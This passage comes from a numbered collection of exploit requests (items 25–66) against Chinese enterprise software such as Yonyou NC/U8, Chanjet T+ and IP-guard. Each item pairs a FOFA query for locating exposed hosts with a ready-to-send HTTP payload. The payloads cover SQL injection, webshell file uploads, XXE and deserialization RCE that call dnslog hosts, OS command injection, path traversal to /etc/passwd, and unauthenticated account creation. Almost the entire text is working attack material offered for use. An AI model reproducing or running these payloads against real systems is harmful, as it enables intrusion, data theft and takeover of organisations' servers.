<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--


25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version = NC633, NC657
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName":"Start",
  "ObjectInstance":{
    "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
      "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "FileName":"cmd",
      "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
}
}

Step 2: visit the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, so when hunting in logs search for the parameter name rather than for SQL keywords.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the file the injected command wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
Time-based: a vulnerable host takes about five seconds longer to answer because of the injected waitfor delay.
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youcat (优卡特) 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
An HTTP 200 response means the account test123456 / 123456 was created without authentication.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
